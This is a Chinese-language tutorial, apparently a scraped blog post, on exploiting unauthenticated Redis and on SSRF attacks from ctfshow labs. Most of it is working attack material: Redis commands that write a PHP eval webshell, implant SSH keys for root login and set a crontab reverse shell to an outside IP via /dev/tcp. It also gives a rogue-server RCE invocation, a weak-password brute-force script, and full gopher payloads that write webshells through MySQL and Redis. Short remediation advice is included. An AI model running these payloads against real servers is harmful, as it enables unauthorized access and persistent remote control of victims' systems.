专业的深圳网站建设公司哪家好,wordpress用旧的编辑器,秦皇岛营销式网站制作,中小学网站模板源码前言
redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库#xff0c;并提供多种语言的API。Redis默认使用 6379 端口。
一、redis未授权访问漏洞
0x01 漏洞描述
描述: Redis是一套开源的使用ANSI C编写、支持网络、可基于内存…前言
redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库并提供多种语言的API。Redis默认使用 6379 端口。
一、redis未授权访问漏洞
0x01 漏洞描述
描述: Redis是一套开源的使用ANSI C编写、支持网络、可基于内存亦可持久化的日志型、键值存储数据库并提供多种语言的API。 Redis默认情况下会绑定在0.0.0.0:6379如果在没有开启认证的情况下可以导致任意用户在可以访问目标服务器的情况下未授权访问Redis以及读取Redis的数据。攻击者在未授权访问Redis的情况下可以利用Redis的相关方法可以成功将自己的公钥写入目标服务器的 /root/.ssh 文件夹的authotrized_keys文件中进而可以直接登录目标服务器。
0x02 影响范围
Redis 5.0.5
0x03 环境搭建
第一种 redis各个版本下载
wget http://download.redis.io/releases/redis-2.8.17.tar.gz
解压 tar -zxvf redis-2.8.17.tar.gz
cd redis-2.8.17/
make
cd src
./redis-cli -h第二种 直接docker启用
0x03 漏洞利用
探测漏洞
nmap -sV -p 6379 -script redis-info 192.168.1.1未授权登录
上边nmap探测出6379对外网开放 允许所有地址访问 直接用linux redis客户端连接
redis-cli -h 192.168.67.4redis操作命令
info #查看redis的信息和服务器信息
flushall 删除所有数据
del key 删除键为key的数据
get key 获得参数key的数据3.1 利用redis写webshell
利用前提
1、目标机redis连接未授权 redis-cli -h 目标ip 连接成功 keys * 未启用认证 2、开启web服务 知道网站路径 如利用phpinfo 得知 或错误爆破路径得知 还需具有文件增删查改权限
利用方法
连接成功后 输入以下指令
config set dir /var/www/html
config set dbfilename redis.php
set webshell ?php eval($_POST[1]); ?
或者
set x \r\n\r\n?php eval($_POST[1]); ?\r\n\r\n
save连接成功
当数据库过大时redis写shell的小技巧
exit(); ?
3.2 利用“公私钥” 认证获取root权限
当redis以root身份运行可以给root账户写入ssh公钥权限直接通过ssh登录服务器。 靶机中开启redis服务 redis-server /etc/redis.conf 在靶机中执行 mkdir /root/.ssh命令 创建ssh公钥存放目录靶机是作为ssh服务器使用的
利用方法
在攻击机中申生成ssh公钥和私钥密码设为空
ssh-keygen -t rsa
进入.ssh目录:cd .ssh/ 将生成的公钥保存到1.txt
(echo -e \n\n; cat id_rsa.pub; echo -e \n\n) 1.txt
cat 1.txt | redis-cli -h 192.168.157.129 -x set crack
redis-cli -h 192.168.157.129
config set dir /root/.ssh # 更改redis备份路径为ssh公钥存放目录一般为/root/.ssh
config set dbfilename authorized_keys #设置上传公钥的备份文件名字为authorized_key s
config get dbfilename #检查是否更改成功
save #保存
exit #退出
ssh -i id_rsa root192.168.157.129 #在攻击机上使用ssh免密登录靶机连接成功
3.3 利用crontab反弹shell
在权限足够的情况下利用redis写入文件到计划任务目录下执行
利用方法
端口监听 在攻击者服务器上监听一个端口未被占用的任意端口
nc -lvnp 9897攻击详情
连接redis写入反弹shell
redis-cli -h 192.168.157.129
config set dir /var/spool/cron
config set dbfilename root
set xxx \n\n*/1 * * * * /bin/bash -i/dev/tcp/192.168.157.137/9897 01\n\n
save在靶机上 看到 写入成功 过一分钟左右可以收到shell
0x04 漏洞修复
1、禁止公网访问redis服务端口 2、禁止使用root权限启动redis服务 3、配置安全组限制可连接redis服务器的ip。 4、redis.conf中修改配置 把 #bind 127.0.0.1前面的注释#号去掉然后把127.0.0.1改成你允许访问你的redis服务器的ip地址表示只允许该ip进行访问这种情况下我们在启动redis服务器的时候不能再用:redis-server改为:redis-server path/redis.conf 即在启动的时候指定需要加载的配置文件,其中path/是你上面修改的redis配置文件所在目录这个方法有一点不太好我难免有多台机器访问一个redis服务。 5、设置密码redis.conf requirepass 修改如下 requirepass yourpassword yourpassword就是redis验证密码设置密码以后发现可以登陆但是无法执行命令了。 命令如下: redis-cli -h yourIp -p yourPort//启动redis客户端并连接服务器 keys * //输出服务器中的所有key 报错如下 (error) ERR operation not permitted
这时候你可以用授权命令进行授权就不报错了
命令如下: auth youpassword
测试是否存在未授权或弱口令的脚本
或者直接用nmap -script redis-info
#! /usr/bin/env python
# _*_ coding:utf-8 _*_
import socket
import sys
PASSWORD_DIC[redis,root,oracle,password,paaw0rd,abc123!,123456,admin]
def check(ip, port, timeout):try:socket.setdefaulttimeout(timeout)s socket.socket(socket.AF_INET, socket.SOCK_STREAM)s.connect((ip, int(port)))s.send(INFO\r\n)result s.recv(1024)if redis_version in result:return u存在未授权访问elif Authentication in result:for pass_ in PASSWORD_DIC:s socket.socket(socket.AF_INET, socket.SOCK_STREAM)s.connect((ip, int(port)))s.send(AUTH %s\r\n %(pass_))result s.recv(1024)if OK in result:return u存在弱口令密码%s % (pass_)except Exception as e:pass
if __name__ __main__:ipsys.argv[1]portsys.argv[2]print check(ip,port, timeout10)二 、redis 远程命令执行漏洞 (CNVD-2019-21763)
0x01 漏洞描述
Redis未授权访问在4.x/5.0.5以前版本下我们可以使用master/slave模式加载远程模块通过动态链接库的方式执行任意命令。
描述: Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库并提供多种语言的API。 由于在Reids 4.x及以上版本中新增了模块功能攻击者可通过外部拓展在Redis中实现一个新的Redis命令。攻击者可以利用该功能引入模块在未授权访问的情况下使被攻击服务器加载恶意.so 文件从而实现远程代码执行。
0x02 影响范围
Redis 2.x3.x4.x5.x
0x03 漏洞利用
使用如下POC即可直接执行命令 https://github.com/vulhub/redis-rogue-getshell
nc -lvvp 9897python3 redis-rogue-server.py --rhost 118.193.36.37 --rport 33971 --lhost 119.29.67.4 --lport 8080
r #反弹shell r 直接交互i
ip # 反弹ip
9897 #监听端口0x04 漏洞修复
1、禁止外部访问Redis 服务端口
2、禁止使用root权限启动Redis服务
3、配置安全组限制可连接Redis服务器的IP。
三 、SSRF攻击内网五密码mysql
0x01 靶场环境
ctfshow359关
0x02解题
1. 随意输入用户名密码点击login后 发现 请求包含有returl 改成dnslog地址后dnslog地址收到请求 说明 服务器请求了dns地址
2.看看有无回显(有回显)
改为http://127.0.0.1 说明有回显
3. 探测其他端口
靶场已经说了 是mysql 无密码 就不探测内网了直接测本机的 端口了
先用dict 协议 响应时间都没有变可能不支持dict协议 在用gopher协议gopher://127.0.0.1:3306 根据响应时间 得知开放了 3306端口和80端口 并发数设置为1
4. gopher协议通过mysql写入webshell
工具
https://github.com/tarunkant/Gopherus.git 写入 select ‘?php eval($_REQUEST[0]); ?’ into outfile ‘/var/www/html/4.php’; gopher://127.0.0.1:3306/_%a3%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%72%6f%6f%74%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%4b%00%00%00%03%73%65%6c%65%63%74%20%27%3c%3f%70%68%70%20%40%65%76%61%6c%28%24%5f%52%45%51%55%45%53%54%5b%30%5d%29%3b%20%3f%3e%27%20%69%6e%74%6f%20%6f%75%74%66%69%6c%65%20%27%2f%76%61%72%2f%77%77%77%2f%68%74%6d%6c%2f%34%2e%70%68%70%27%3b%01%00%00%00%01_后面要进行url编码因为curl还会进行一次url解码
gopher://127.0.0.1:3306/_%25a3%2500%2500%2501%2585%25a6%25ff%2501%2500%2500%2500%2501%2521%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2572%256f%256f%2574%2500%2500%256d%2579%2573%2571%256c%255f%256e%2561%2574%2569%2576%2565%255f%2570%2561%2573%2573%2577%256f%2572%2564%2500%2566%2503%255f%256f%2573%2505%254c%2569%256e%2575%2578%250c%255f%2563%256c%2569%2565%256e%2574%255f%256e%2561%256d%2565%2508%256c%2569%2562%256d%2579%2573%2571%256c%2504%255f%2570%2569%2564%2505%2532%2537%2532%2535%2535%250f%255f%2563%256c%2569%2565%256e%2574%255f%2576%2565%2572%2573%2569%256f%256e%2506%2535%252e%2537%252e%2532%2532%2509%255f%2570%256c%2561%2574%2566%256f%2572%256d%2506%2578%2538%2536%255f%2536%2534%250c%2570%2572%256f%2567%2572%2561%256d%255f%256e%2561%256d%2565%2505%256d%2579%2573%2571%256c%254b%2500%2500%2500%2503%2573%2565%256c%2565%2563%2574%2520%2527%253c%253f%2570%2568%2570%2520%2540%2565%2576%2561%256c%2528%2524%255f%2552%2545%2551%2555%2545%2553%2554%255b%2530%255d%2529%253b%2520%253f%253e%2527%2520%2569%256e%2574%256f%2520%256f%2575%2574%2566%2569%256c%2565%2520%2527%252f%2576%2561%2572%252f%2577%2577%2577%252f%2568%2574%256d%256c%252f%2534%252e%2570%2568%2570%2527%253b%2501%2500%2500%2500%2501getshell成功
四、 ssrf攻击内网redis gopher协议
0x01 靶场环境
ctfshow 360 0x02 解题
1. post url请求
根据代码提示 post url 请求 curl_exec 也是存在ssrf漏洞
2. 探测回显
也是全回显 也出网
3. 探测其他端口
这里dict 协议 探测时间不会变 gopher可以 urlgopher://127.0.0.1:3306 开放 80 3306 6379端口 不过urldict://127.0.0.1:6379/info 这样 dict协议也能用
4. gohper 攻击6379端口
python2 gopherus.py --exploit redis phpshell gopher://127.0.0.1:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2432%0D%0A%0A%0A%3C%3Fphp%20eval%28%24_POST%5B%27cmd%27%5D%29%3B%3F%3E%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%2413%0D%0A/var/www/html%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%249%0D%0Ashell.php%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A%0A
一样将 后边的url编码 gopher://127.0.0.1:6379/%252A1%250D%250A%25248%250D%250Aflushall%250D%250A%252A3%250D%250A%25243%250D%250Aset%250D%250A%25241%250D%250A1%250D%250A%252432%250D%250A%250A%250A%253C%253Fphp%2520eval%2528%2524_POST%255B%2527cmd%2527%255D%2529%253B%253F%253E%250A%250A%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%25243%250D%250Adir%250D%250A%252413%250D%250A%2Fvar%2Fwww%2Fhtml%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%252410%250D%250Adbfilename%250D%250A%25249%250D%250Ashell.php%250D%250A%252A1%250D%250A%25244%250D%250Asave%250D%250A%250A
这里虽然返回504 但是 已经写入成功了
